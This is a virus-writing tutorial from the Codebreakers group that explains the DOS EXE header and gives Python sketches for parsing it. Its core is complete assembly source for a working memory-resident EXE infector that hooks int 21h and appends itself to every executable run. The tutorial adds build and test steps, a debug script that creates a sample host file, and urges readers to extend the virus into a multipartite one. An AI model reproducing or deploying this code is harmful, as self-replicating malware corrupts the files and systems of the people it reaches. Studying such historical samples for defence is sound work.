                                 Lesson 4
                          Guide To EXE Infection
                                    By
                                Horny Toad
                              



        Now onto the 4th lesson, EXE file infection.  Boy, the topics
never seem to get any easier, do they?  The difficult aspect of EXE
infection is that there is no ONE technique to cover all forms of EXE
infection.  I will, therefore, keep to the basics in this tutorial and
in later articles, address different techniques which you can use.


What is an EXE file?
---------------------
        One of the first things that we need to do is understand what
an EXE file is and, more importantly, what it looks like.  Quite simply,
an EXE file is an improvement over the COM file format in that it allows
the program size to exceed one segment (64K).  COM programs are limited
to 64K, including 256 bytes for the PSP.  EXE files, on the other hand,
can occupy a much larger space by using more than one segment.  The
limit on an EXE file's size is the amount of memory and hard drive space
you have.  There are other characteristics that differ between the EXE
and COM formats.  In a COM file, the stack is set up automatically,
whereas in an EXE file, you need to define it yourself.  The stack is
probably the single most difficult concept to grasp when writing EXE
files.  Care must be taken that you define the stack large enough to
handle all of the push and pop instructions that your program will use.
If your stack is too small, your program is sure to crash.  The next
difference between the two file formats is the initialization of the
data segment.  In a COM file, the data lives in an area within the code
segment.  Since a COM file only uses one segment anyway, the data,
code, and stack segments all fall right together.  Very convenient,
right?  Well, in an EXE file, after the program loader puts the file
in memory, both DS and ES contain the address of the PSP!  Remember
that!  Always remember to load the address of the data segment into
DS when coding EXE files.
        At the heart of the EXE file format lies the EXE header.  The
EXE header is a minimum of 32 bytes and describes how the program
needs to be loaded.  I call the header the heart of the EXE file format
because a virus which attacks EXE files needs to use practically all of
the information in it.  Therefore, pay attention so that you thoroughly
understand this concept.

Let's take a look at the EXE header format:

The length of each element in the EXE header is 2 bytes (1 WORD).
The descriptive names of each element in the header are the traditional
names that have been used since the EXE file format was created.  You
can give them whatever symbolic name you want to in your virus.


                           EXE Header Format

Offset          Length          Content         Description
-----------------------------------------------------------------------
0h              2               4Dh 5Ah         EXE file signature "MZ"
2h              2               PartPag         Bytes used in the last
                                                512 byte page (0 = full)
4h              2               PagCnt          Length of file in 512
                                                byte pages
6h              2               ReloCnt         Number of elements in
                                                the relocation table
8h              2               HdrSize         Header length in
                                                16 byte paragraphs
0Ah             2               MinMem          Minimum extra memory
                                                needed, in paragraphs
0Ch             2               MaxMem          Maximum extra memory
                                                wanted, in paragraphs
0Eh             2               ReloSS          Segment correction for
                                                stack (SS)
10h             2               ExeSP           Value of stack pointer
                                                (SP)
12h             2               ChkSum          Checksum
14h             2               ExeIP           Value of instruction
                                                pointer (IP)
16h             2               ReloCS          Segment correction for
                                                CS
18h             2               TablOff         Offset for the first
                                                relocation element
1Ah             2               Overlay         Overlay number

               
That looks very pretty, but how does it actually look?  To tell you the
truth, looking at the EXE header in DEBUG makes it look so much
simpler.  The only catch is that you need to rename the extension to
something other than ".EXE" in order to view the header, because DEBUG
loads a file named .EXE the way DOS would and the header never shows
up in memory.  You can, if you know exactly where the file sits on the
disk, use the DEBUG L command to load a certain sector and then
(D)isplay the contents of the sector.  Nahh!  Too complicated.  Just
rename the damn thing.  Make sure that you have read Horny Toad &
Opic's guide to disassembly and understand how to use DEBUG.  I have
included some sample files in this tutorial to give you some hands-on
work with EXE files.  One of the samples is a basic do-nothing EXE
file.  Let's say that I called this file someExe.exe and renamed a copy
of it to someExe.eww.  Below, I will display the contents of the
someExe header.

At a prompt, type:

c:\>debug someExe.eww
-d

??:0100  4D 5A 11 00 02 00 01 00-20 00 11 00 FF FF 02 00  MZ...... .......
??:0110  00 01 00 00 00 00 00 00-3E 00 00 00 01 00 FB 71  ........>......q
??:0120  6A 72 00 00 00 00 00 00-00 00 00 00 00 00 00 00  jr..............

For an easier to read version of the same information, use SPo0ky's
EXE header reader for the following results:

EXE Signature ........................................ MZ
Size of Last Page .................................... 0011
Number of 512 byte pages in file ..................... 0002
Number of Relocation Entries ......................... 0001
Header size in Paragraphs ............................ 0020
Minimum additional Memory required in paragraphs ..... 0011
Maximum additional Memory required in paragraphs ..... FFFF
Initial SS relative to start of file ................. 0002
Initial SP ........................................... 0100
Checksum (unused) .................................... 0000
Initial IP ........................................... 0000
Initial CS relative to start of file ................. 0000
Offset within Header of Relocation Table ............. 003E
Overlay Number ....................................... 0000

Relocation Table Entries:
        0000:0001


However you choose to read the EXE header is fine.  At this point,
just make sure that you are aware of its existence.
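
If you have neither DEBUG nor a header reader at hand, the same fields
can be pulled out with a few lines of script.  What follows is only a
sketch in Python, not SPo0ky's tool.  The names MZHeader,
parse_mz_header and SAMPLE are made up for this example, and SAMPLE is
simply the first 1Ch bytes of the dump shown earlier.

```python
import struct
from collections import namedtuple

# Field names follow the traditional names used in the header table.
MZHeader = namedtuple(
    "MZHeader",
    "signature part_pag pag_cnt relo_cnt hdr_size min_mem max_mem "
    "relo_ss exe_sp chk_sum exe_ip relo_cs tabl_off overlay",
)


def parse_mz_header(data: bytes) -> MZHeader:
    """Decode the first 1Ch bytes of an EXE file (little-endian words)."""
    if len(data) < 0x1C:
        raise ValueError("need at least 1Ch bytes of header")
    hdr = MZHeader(*struct.unpack_from("<2s13H", data, 0))
    if hdr.signature not in (b"MZ", b"ZM"):
        raise ValueError("not an EXE file")
    return hdr


# First 1Ch bytes of the sample dump (assumption: copied by hand).
SAMPLE = bytes.fromhex(
    "4D 5A 11 00 02 00 01 00 20 00 11 00 FF FF 02 00 "
    "00 01 00 00 00 00 00 00 3E 00 00 00"
)

if __name__ == "__main__":
    for name, value in parse_mz_header(SAMPLE)._asdict().items():
        if name == "signature":
            print(f"{name:10} {value.decode('ascii')}")
        else:
            print(f"{name:10} {value:04X}")
```

Run against the sample bytes, this reports the same values as the
listing above, for example 0011 for PartPag and 0020 for HdrSize.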

I have begun including the debug scripts of the programs that I use in
the tutorial so that people who do not have access to the Codebreakers
magazine can extract all of the sample programs from the tutorial with
the help of debug. The debug usage differs slightly from the other
tutorials, so make sure you read the instructions at the end of this
file.

Now, let's take a look at the individual contents of the EXE header
and identify their function in the infection process.


EXE signature
-------------
The first word in the header is the traditional EXE file signature "MZ".
These are the initials of Mark Zbikowski, the programmer who designed
the EXE file format.  Obviously, you already know from my last tutorial
that you can use this unique signature to identify whether or not the
file is of the EXE format.


PartPag and PagCnt (need to be modified)
------------------
PartPag and PagCnt together describe the entire file size, including
the header.  PagCnt, as the name implies, is the length of the file
expressed in 512 byte pages, counting a partly filled last page as a
whole page.  PartPag is the number of bytes used on that last page,
that is, the length of the file mod 512.  Mod.  You had better learn
this concept now, because it will follow you on into higher level
programming languages such as C++.

5 % 2 = 1
5 / 2 = 2

The mod (%) is the remainder left over after integer division has taken
place.  Simple enough.  PartPag and PagCnt will need to be modified to
allow for the inclusion of your virus code.
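
To see the page arithmetic in action, here is a small sketch in Python.
The function names split_size and join_size are invented for this
example.  It assumes the usual convention that a PartPag of 0 means the
last page is completely full.

```python
PAGE = 512  # bytes per page in the EXE header


def split_size(size):
    """Turn a file size in bytes into (PagCnt, PartPag)."""
    pag_cnt, part_pag = divmod(size, PAGE)   # quotient and remainder
    if part_pag:
        pag_cnt += 1                         # partly filled last page counts
    return pag_cnt, part_pag


def join_size(pag_cnt, part_pag):
    """Turn (PagCnt, PartPag) back into a file size in bytes."""
    if part_pag == 0:
        return pag_cnt * PAGE                # last page is full
    return (pag_cnt - 1) * PAGE + part_pag
```

For the sample header, PagCnt 0002 and PartPag 0011 join to 211h bytes,
which is the length of the sample file.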


ReloCnt
-------
The next item in the header represents the number of items in the
relocation table.  What the hell is a relocation table?  A relocation
table contains two words (offset, segment) for each place in the
program that holds a segment value and needs to be adjusted to account
for where the program was loaded.  You can skip over this because you
will not have to make any modifications here but...
        For each entry, the loader reads both words and adds the
        loading segment address (usually PSP seg + 10h) to the entry's
        segment.  That segment, together with the entry's offset,
        points at a word in the loaded program.  The loading segment
        is then added to that word in memory.
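
The loader's side of this can be imitated in a few lines.  The sketch
below is Python and only an illustration of the fix-up step, not DOS
code.  The names build_sample and apply_relocations are invented, and
build_sample rebuilds just the parts of the sample EXE that matter
here (header words, the one relocation entry at 3Eh, and the 11h bytes
of program).

```python
import struct


def build_sample() -> bytes:
    """Rebuild the do-nothing sample EXE (assumption: bytes copied by hand)."""
    exe = bytearray(0x200)                       # HdrSize 20h paragraphs
    exe[0:0x1C] = bytes.fromhex(
        "4D 5A 11 00 02 00 01 00 20 00 11 00 FF FF 02 00 "
        "00 01 00 00 00 00 00 00 3E 00 00 00"
    )
    exe[0x3E:0x42] = bytes.fromhex("01 00 00 00")  # entry 0000:0001
    exe += bytes.fromhex(
        "B8 01 00 8E D8 8E C0 B4 4C A0 00 00 CD 21 00 00 00"
    )
    return bytes(exe)


def apply_relocations(exe: bytes, load_seg: int) -> bytearray:
    """Return the program image with every relocation entry applied."""
    relo_cnt, hdr_size = struct.unpack_from("<HH", exe, 0x06)
    (tabl_off,) = struct.unpack_from("<H", exe, 0x18)
    image = bytearray(exe[hdr_size * 16:])       # program without header
    for i in range(relo_cnt):
        off, seg = struct.unpack_from("<HH", exe, tabl_off + 4 * i)
        pos = seg * 16 + off                     # place inside the image
        (word,) = struct.unpack_from("<H", image, pos)
        struct.pack_into("<H", image, pos, (word + load_seg) & 0xFFFF)
    return image
```

In the sample, the single entry 0000:0001 points at the operand of the
first instruction (B8 01 00, a mov ax,0001), so with a loading segment
of 1234h that operand becomes 1235h.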


HdrSize
-------
The next element of the header is the header size.  Quite self
explanatory, HdrSize holds the size of the header in 16-byte
paragraphs.  With the information that you have seen thus far, you
can determine the actual bare program size with the equation:

        Size=((PagCnt*512)-(HdrSize*16))-(512-PartPag)

If PartPag is 0, the last page is full and the last term drops out.
You will also not have to fool with the header size.
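
As a quick check of the equation, here it is as a Python sketch.  The
function name image_size is invented for this example, and the test
for a PartPag of 0 (a full last page) is an addition that the equation
as printed does not spell out.

```python
def image_size(pag_cnt, part_pag, hdr_size):
    """Bare program size in bytes, without the EXE header."""
    size = pag_cnt * 512 - hdr_size * 16
    if part_pag:                      # 0 means the last page is full
        size -= 512 - part_pag
    return size
```

With the sample values (PagCnt 0002, PartPag 0011, HdrSize 0020) this
gives 11h bytes of actual program.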


MinMem & MaxMem
---------------
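Two more fairly obvious items: MinMem and MaxMem.  These two values
tell the loader how much memory to allocate for the program beyond the
size of the loaded image.  MinMem is the least that it needs and MaxMem
is the most that it would like.  A MaxMem of FFFFh asks for all of the
available memory.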

                            
ReloSS & ExeSP   (need to be modified)
--------------
ReloSS and ExeSP are two items that need to be changed to account for
the code that you have just appended.  ReloSS added to the starting
segment address gives you your SS register, and ExeSP is loaded
straight into SP.

Checksum         (should be modified)
--------
The Checksum item is the traditional place to store an infection
marker.  

ReloCS & ExeIP   (need to be modified)
--------------
ReloCS is definitely an important item.  The item stored here, along
with the ExeIP, represents the beginning address to our virus code.
This value will be initially saved from the host program so that it
can be recalled and control returned back to the host.
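
To make the segment corrections concrete, here is how the start-up
registers and the position of the first instruction inside the file
follow from the header.  This is a Python sketch with invented names
(initial_registers, entry_file_offset).  It assumes ReloCS is a small
positive value, as in the sample, and does not handle wrapped segment
values.

```python
def initial_registers(load_seg, relo_cs, exe_ip, relo_ss, exe_sp):
    """Registers as the loader sets them before the program starts."""
    return {
        "CS": (load_seg + relo_cs) & 0xFFFF,   # segment correction applied
        "IP": exe_ip,                          # used as is
        "SS": (load_seg + relo_ss) & 0xFFFF,   # segment correction applied
        "SP": exe_sp,                          # used as is
    }


def entry_file_offset(hdr_size, relo_cs, exe_ip):
    """Offset in the file of the first instruction executed."""
    return hdr_size * 16 + relo_cs * 16 + exe_ip
```

For the sample header and a loading segment of 1000h, this gives
CS:IP = 1000:0000 and SS:SP = 1002:0100, and the first instruction sits
at file offset 200h, right behind the header.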

TablOff
--------
This is the offset to the first relocation element in the file.


Overlay
-------
If this is the program main module, the value should be zero.


Below is a simple resident EXE infector.  I chose to include a
resident virus rather than a direct action infector, because I
believe that, if you can write a resident EXE infector, making it
non-resident would be a piece of cake.  One thing that I was
considering doing was to follow the modular style of coding that I
used in the last tutorial.  One trend that I was seeing in many
viruses was that people were simply copying the code.  After Slam #4
was released, you have no idea how many EXE infectors started to
hit the scene that were essentially a word for word copy.  Whatever.
In the end, I decided to include the virus below so that you can
see everything working in one virus, rather than the modular style
of instruction.  I am not sure which way is better, so I will probably
continue to switch back and forth between styles.  Another thing,
while I am in the preaching mode: from now on, I will not be explaining
the most basic concepts of assembly.  If you have been following
along with the tutorials, you should understand every concept that is
in this tutorial.  Really, the only new aspect that you need to be
aware of with EXE infection is that you need to change certain values
in the header to accommodate your virus.  You already know how to do
this.  In the beginning tutorials, you played around with elements of
the DTA.  Well, you are going to be doing the same thing with the
header, reading it into a buffer and reading and modifying the values
that I have pointed out above.


.286
virus segment
  assume cs:virus, ds:virus, es:virus

 jumps
 org 0CBh

start:

  call delta                        ;Calculate delta offset
delta:
  pop bp
  sub bp,offset delta

  push ds                           ;save PSP address

  push cs cs
  pop ds es

  mov ax,0CBCBh                     ;our "Codebreaker" residency check
  int 21h                           ;>what is CB?
  cmp bx,0C001h                     ;>C001!! :o)
  je restore                        ;its already resident

  pop ds                            
  push ds                           ;PSP address back into DS
  ;--------------------------------------------------
  mov ax,ds                                 ;MCB residency
  dec ax                                    ;For further clarification
  mov ds,ax                                 ;read Codebreaker Tutorial 3

  sub word ptr ds:[3],40h
  sub word ptr ds:[12h],40h

  xor ax,ax
  mov ds,ax

  dec word ptr ds:[413h]

  mov ax,word ptr ds:[413h]
  shl ax,6

  mov es,ax

  push cs
  pop ds

  lea si,[bp+start]
  xor di,di
  mov cx,the_end - start
  rep movsb
  ;--------------------------------------------------
  xor ax,ax                                 ;Setting of interrupts
  mov ds,ax                                 ;For further clarification
                                            ;read Codebreaker Tutorial 3
  mov ax,es                                 
  mov bx,new_int21h-start
  cli
  xchg bx,word ptr ds:[21h*4]
  xchg ax,word ptr ds:[21h*4+2]
  mov word ptr es:[old_int21h-start],bx
  mov word ptr es:[old_int21h+2-start],ax
  sti
  ;--------------------------------------------------
  push cs cs
  pop ds es

  mov ah,9                                  ;Warns the poor shmuck
  lea dx,[bp+message]
  int 21h

restore:                                    ;Control handed back

  lea si,[bp+old_ip]                        ;Restore orig IP
  lea di,[bp+original_ip]
  mov cx,4
  rep movsw

; Now for a clarification of the next four lines. At the beginning of
; the virus DS contains the address of the PSP. We now restore the
; address from the stack, place the address in ES.  Then add 10h to
; skip over the PSP.  Skip over the PSP(100h) with 10h? Sounds a little
; fishy, right?  Well, remember that when you add 10h to AX, you are
; adding 10h segments. Each segment is 10h bytes, so 10h*10h=100h (PSP)

  pop ds
  mov ax,ds
  mov es,ax
  add ax,10h

  add word ptr cs:[bp+original_cs],ax       ;Orig CS
  cli
  add ax,word ptr cs:[bp+original_ss]       ;Orig SS
  mov ss,ax
  mov sp,word ptr cs:[bp+original_sp]       ;Orig SP
  sti

 db 0eah                                    ;jump to to it
 original_ip dw ?                           ;
 original_cs dw ?
 original_ss dw ?
 original_sp dw ?


 new_int21h:                                ;our int 21h handler
  pushf                                     ;push the flags
  cmp ax,0CBCBh                             ;residency check
  jne no_install_check
  mov bx,0C001h                             ;already resident
  popf                                      ;restore all flags
  iret                                      ;return
 no_install_check:
  cmp ah,4bh                                ;check if execute
  je infect
 return:
  popf                                      ;restore all flags
 db 0eah                                    ;jmp to orig int 21h
 old_int21h dd ?

 infect:
  pusha                                     ;only 286, saves all gen reg
  push ds
  push es

  call tsr_delta
 tsr_delta:
  pop bp                                    ;a tsr delta offset %-)
  sub bp,offset tsr_delta

  mov ax,3d02h                              ;open file in DS:DX
  int 21h
  jc exit

  xchg ax,bx                                ;file handle to bx

  push cs cs
  pop ds es

  mov ah,3fh                                ;Read the target header
  lea dx,[bp+header]                        ;into our buffer
  mov cx,1ch
  int 21h

  cmp word ptr cs:[bp+header],'ZM'          ;check if its an EXE
  je ok
  cmp word ptr cs:[bp+header],'MZ'
  je ok
  jmp close

 ok:
  cmp word ptr cs:[bp+header+12h],'BC'      ;Checksum value checked for
  je close                                  ;previous infection

  mov word ptr cs:[bp+header+12h],'BC'      ;Mark it as infected

  mov ax,word ptr cs:[bp+header+14h]        ;Save orig ExeIP
  mov word ptr cs:[bp+old_ip],ax            ;Store in our buffer
  mov ax,word ptr cs:[bp+header+16h]        ;Save orig ReloCS
  mov word ptr cs:[bp+old_cs],ax            
  mov ax,word ptr cs:[bp+header+0eh]        ;Save orig ReloSS
  mov word ptr cs:[bp+old_ss],ax
  mov ax,word ptr cs:[bp+header+10h]        ;Save orig ExeSP
  mov word ptr cs:[bp+old_sp],ax

  mov ax,4202h                              ;Set pointer to end of file
  xor cx,cx
  xor dx,dx
  int 21h

  push ax dx                                ;Save EOF results

                                            ;Calculate new CS:IP, we set
                                            ;it to the EOF (this is where
                                            ;we will attach our virus)

  mov cx,16                                 ;Convert filesize into 16 byte
  div cx                                    ;paragraphs

  sub ax,word ptr cs:[bp+header+8]          ;Substract Header size from
                                            ;filesize to get the image
                                            ;(code/data) size.

                                            ;save:
  mov word ptr cs:[bp+header+14h],dx        ;New ExeIP
  mov word ptr cs:[bp+header+16h],ax        ;New ReloCS

  pop dx ax                                 ;restore saved filesize

  add ax,the_end - start                    ;Add virus size to file size
  adc dx,0                                  ;Adds carry to DX

  mov cx,512                                ;Calculate amount of pages
  div cx

  cmp dx,0
  je no_remainder
  inc ax                                    ;if remainder, add 1
 no_remainder:

  mov word ptr cs:[bp+header+4],ax          ;New PageCnt
  mov word ptr cs:[bp+header+2],dx          ;New PartPag

  mov ah,40h                                ;write the virus to the EOF
  lea dx,[bp+start]
  mov cx,the_end - start
  int 21h

  mov ax,4200h                              ;Send pointer to beginning
  xor cx,cx
  xor dx,dx
  int 21h

  mov ah,40h                                ;Write the new header
  lea dx,[bp+header]
  mov cx,1ch
  int 21h

mov al,7
int 29h                                     ; just a BEEEEEPPP

 close:
  mov ah,3eh                                ;close file
  int 21h

 exit:
  pop es
  pop ds
  popa
  jmp return


 old_ip dw offset exit_prog
 old_cs dw 0
 old_ss dw 0
 old_sp dw 0fffeh

 header db 1ch dup(?)                       ;Buffer for header

 message db 10,13,10,13
 db '- SPo0ky''s EXAMPLE TSR EXE infector for Horny Toad''s ''Guide To EXE Infection'' -',10,13
 db '- has been installed in your computers memory and will from now on infect any -',10,13
 db '- EXE file that you execute.                                                  -',10,13
 db '- You can use TBCLEAN (www.thunderbyte.com) to clean this virus.              -',10,13,10,13
 db '                           - www.codebreakers.org -',10,13,'$'

 the_end:

 exit_prog:
  mov ax,4c00h                              ;Request terminate program
  int 21h
 
virus ends
end start


In order to see the above virus work.  Cut the virus out of this file
and save it in a file exevir.asm.

At a prompt with TASM/TLINK in the same directory, type:

c:\>tasm exevir.asm
c:\>tlink exevir.obj

Use the myexe.exe (below) as the host program.  With both of the
programs in the same directory, execute the virus, then execute
the host program.  If you look at the filesize using the
(dir)ectory command, you will see that it has increased in length.
Test this virus in a MSDOS box from windows and when you exit out
of the MSDOS box, the virus will be gone. If you check the header
now, you will be able to see the changes made after infection. Take
a look at that beautiful "CB" infection marker.


??:0100  4D 5A 5A 01 03 00 01 00-20 00 11 00 FF FF 02 00   MZZ..... .......
??:0110  00 01 43 42 01 00 01 00-3E 00 00 00 01 00 FB 71   ..CB....>......q
??:0120  6A 72 00 00 00 00 00 00-00 00 00 00 00 00 00 00   jr..............



        To write the definitive guide to all forms of EXE infection, I
would need to quit my day job (which I've thought of doing) and just
write a book.  In the end it is better to have a bunch of installments
attacking each issue and facet of virus writing.  Look for the future
Codebreaker tutorials to become much more specific and advanced.  If you
can understand how to infect COM and EXE files, along with what role
encryption and polymorphism play in virus effectiveness, you are well
on your way to making some really awesome creations.  The only thing
that you need to add from here is some boot infection techniques to
the virus and watch out, you'll have a decent multipartite virus. I
guess my one piece of advice now is to read code and absorb it.  Start
to become critical of others' code and use that knowledge and judgement
to develop your own style.  Enough preaching!


Have fun!

Good luck!

Horny Toad



SAMPLE PROGRAMS USED IN TUTORIAL
--------------------------------
In order to extract this sample program, cut it out of this file and
paste it into a file named "myexe.txt".

At the prompt, type:

c:\>debug < myexe.txt
c:\>rename myexe.exd myexe.exe

You will then have a sample infectable EXE file.



N MYEXE.EXD
E 0100 4D 5A 11 00 02 00 01 00 20 00 11 00 FF FF 02 00 
E 0110 00 01 00 00 00 00 00 00 3E 00 00 00 01 00 FB 71 
E 0120 6A 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 
E 0140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0300 B8 01 00 8E D8 8E C0 B4 4C A0 00 00 CD 21 00 00 
E 0310 00 
RCX
0211
W
Q

